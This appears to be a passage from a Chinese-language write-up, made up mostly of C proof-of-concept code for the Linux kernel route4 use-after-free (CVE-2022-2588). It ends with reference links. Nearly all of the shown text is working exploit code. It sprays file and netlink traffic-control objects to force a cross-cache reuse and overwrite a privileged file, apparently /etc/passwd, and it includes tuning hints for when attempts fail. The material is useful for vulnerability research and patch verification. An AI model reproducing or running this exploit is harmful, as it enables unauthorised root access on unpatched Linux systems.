                write(pipe_file_spray[0][1], &spray_num, sizeof(int));
                if (read(pipe_file_spray[1][0], &msg, 2) != 2)
                {
                    err(1, "read from file spray");
                }
                overlapped = true;
            }
        }
        if (overlapped)
            break;
    }

    sleep(3);
    while (run_write)
    {
        sleep(1);
    }

    if (!overlapped)
    {
        printf("no overlap found :(...\n");
        write(pipe_main[1], "\xff", 1);
    }
    else
    {
        int xx = open(target, 0);
        char buf[0x100] = {};
        // check if user in the passwd
        read(xx, buf, 0x30);
        if (!strncmp(buf, "user", 4))
        {
            write(pipe_main[1], "\x00", 1);
        }
        else
        {
            printf("not successful : %s\n", buf);
            write(pipe_main[1], "\xff", 1);
        }
    }
    while (1)
    {
        sleep(1000);
    }
}

void post_exploit() {}

// this poc assume we have a heap address leaked
int run_exp()
{
    if (pipe(pipe_parent) == -1)
    {
        err(1, "fail to create pipes\n");
    }

    if (pipe(pipe_child) == -1)
    {
        err(1, "fail to create pipes\n");
    }

    if (pipe(pipe_defrag) == -1)
    {
        err(1, "fail to create pipes\n");
    }

    if (pipe(pipe_file_spray[0]) == -1)
    {
        err(1, "fail to create pipes\n");
    }

    if (pipe(pipe_file_spray[1]) == -1)
    {
        err(1, "fail to create pipes\n");
    }

    cpu_cores = sysconf(_SC_NPROCESSORS_ONLN);

    if (fork() == 0)
    {
        // thread for spraying file we want to overwrite
        adjust_rlimit();
        int spray_num = 0;
        if (read(pipe_file_spray[0][0], &spray_num, sizeof(int)) < sizeof(int))
        {
            err(1, "read file spray");
        }

        printf("got cmd, start spraying %s\n", target);
        spray_num = 4096;
        if (fork() == 0)
        {
            for (int i = 0; i < spray_num; i++)
            {
                pin_on_cpu(i % cpu_cores);
                open(target, 0);
            }
            while (1)
            {
                sleep(10000);
            }
        }

        for (int i = 0; i < spray_num; i++)
        {
            pin_on_cpu(i % cpu_cores);
            open(target, 0);
        }
        printf("spray done\n");
        write(pipe_file_spray[1][1], "OK", 2);
        while (1)
        {
            sleep(10000);
        }
        exit(0);
    }

    if (fork() == 0)
    {
        pin_on_cpu(0);
        pre_exploit();
        exploit();
        post_exploit();
    }
    else
    {
        sleep(2);
        if (fork() == 0)
        {
            // do the defragmentation to exhaust all file slabs
            // for cross cache
            adjust_rlimit();
            for (int i = 0; i < 10000; i++)
            {
                pin_on_cpu(i % cpu_cores);
                open(target, 0);
            }
            printf("defrag done\n");
            if (write(pipe_defrag[1], "OK", 2) != 2)
            {
                err(1, "failed write defrag");
            }
            while (1)
            {
                sleep(1000);
            }
        }
        else
        {
            // memory spray thread
            setup_namespace();
            pin_on_cpu(0);
            int sprayfd = socket(PF_NETLINK, SOCK_RAW, 0);
            assert(sprayfd != -1);
            add_qdisc(sprayfd);

            char msg[0x10] = {};
            char payload[256] = {};
            memset(payload + 0x10, 'A', 256 - 0x10);

            if (read(pipe_defrag[0], msg, 2) != 2)
            {
                err(1, "failed read defrag");
            }

            // if the exploit keeps failing, please tune the middle and end
            int middle = 38;
            int end = middle + 40;

            // preparing for cross cache
            for (int i = 0; i < middle; i++)
            {
                add_tc_basic(sprayfd, i + 1, payload, 193, 32);
            }

            add_tc_basic(sprayfd, middle + 1, payload, 193, 32);
            add_tc_basic(sprayfd, middle + 2, payload, 193, 32);
            add_tc_basic(sprayfd, middle + 3, payload, 193, 32);
            if (write(pipe_child[1], "OK", 2) != 2)
            {
                err(1, "write to parent\n");
            }
            // allocate route4
            if (read(pipe_parent[0], msg, 2) != 2)
            {
                err(1, "read from parent");
            }
            // add_tc_basic(sprayfd, middle+2, payload, 129, 32);

            // prepare another part for cross cache
            for (int i = middle + 2; i < end; i++)
            {
                add_tc_basic(sprayfd, i + 1, payload, 193, 32);
            }
            printf("spray 256 done\n");

            for (int i = 1; i < end - 24; i++)
            {
                // prevent double free of 192
                // and being reclaimed by others
                if (i == middle || i == middle + 1)
                    continue;
                delete_tc_basic(sprayfd, i + 1);
            }
            if (write(pipe_child[1], "OK", 2) != 2)
            {
                err(1, "write to parent\n");
            }
            // free route4 here
            if (read(pipe_parent[0], msg, 2) != 2)
            {
                err(1, "read from parent");
            }
            // if (cpu_cores == 1) sleep(1);
            delete_tc_basic(sprayfd, middle + 2);
            delete_tc_basic(sprayfd, middle + 3);
            delete_tc_basic(sprayfd, 1);
            for (int i = middle + 2; i < end; i++)
            {
                delete_tc_basic(sprayfd, i + 1);
            }

            printf("256 freed done\n");

            if (write(pipe_child[1], "OK", 2) != 2)
            {
                err(1, "write to parent\n");
            }
            while (1)
            {
                sleep(1000);
            }
        }
    }
}

int main(int argc, char **argv)
{
    global = (char *)mmap(NULL, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC,
                          MAP_SHARED | MAP_ANON, -1, 0);
    memset(global, 0, 0x2000);

    self_path = global;
    snprintf(self_path, 0x100, "%s/%s", get_current_dir_name(), argv[0]);
    printf("self path %s\n", self_path);

    int fd = open(target, 0);
    content = (char *)(global + 0x100);
    strcpy(content, overwrite);
    read(fd, content + strlen(overwrite), 0x1000);
    close(fd);

    assert(pipe(pipe_main) == 0);

    printf("prepare done\n");

    if (fork() == 0)
    {
        run_exp();
        while (1)
        {
            sleep(10000);
        }
    }

    char data;
    read(pipe_main[0], &data, 1);
    if (data == 0)
    {
        printf("succeed\n");
    }
    else
    {
        printf("failed\n");
    }
}

参考链接：

https://github.com/Markakd/CVE-2022-2588

https://paper.seebug.org/2019/

https://elixir.bootlin.com/linux/v5.14/source